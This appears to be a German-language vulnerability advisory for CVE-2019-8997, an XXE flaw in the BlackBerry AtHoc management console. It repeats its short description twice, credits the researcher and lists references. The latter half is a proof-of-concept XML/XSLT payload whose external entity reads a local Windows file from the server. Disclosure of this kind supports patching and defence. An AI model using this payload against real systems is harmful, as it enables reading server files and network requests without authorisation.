
Eine XML-External-Entity-Injection-Schwachstelle (XXE) im Management System (Konsole) von BlackBerry AtHoc-Versionen vor 7.6 HF-567 könnte es einem Angreifer ermöglichen, potenziell beliebige lokale Dateien vom Anwendungsserver zu lesen oder Anfragen im Netzwerk zu senden, indem er böswillig gestaltetes XML in ein vorhandenes Feld eingibt.
Eine XML-External-Entity-Injection-(XXE)-Sicherheitslücke im Management System (Konsole) von BlackBerry AtHoc Versionen vor 7.6 HF-567 könnte es einem Angreifer ermöglichen, beliebige lokale Dateien vom Anwendungsserver zu lesen oder Netzwerkanfragen zu stellen, indem bösartig gestaltetes XML in ein vorhandenes Feld eingegeben wird.
Nolan B. Kennedy (nxkennedy)
http://support.blackberry.com/kb/articleDetail?articleNumber=000047227
https://nvd.nist.gov/vuln/detail/CVE-2019-8997
https://www.nolanbkennedy.com/feed/xxe-vulnerability-blackberry-athoc
https://www.mindpointgroup.com/blog/pen-test/xxe-vulnerability-in-blackberry-athoc-networked-crisis-communication-platform/
<!DOCTYPE doc [
<!ELEMENT doc ANY >
<!ENTITY foo SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="1.0">
<xsl:output method="html" />
<xsl:template match="/">
<doc>&foo;</doc>
<head></head>
<body style="margin: 0; padding: 0;" oncontextmenu="return
false;"></body>
</xsl:template>
</xsl:stylesheet>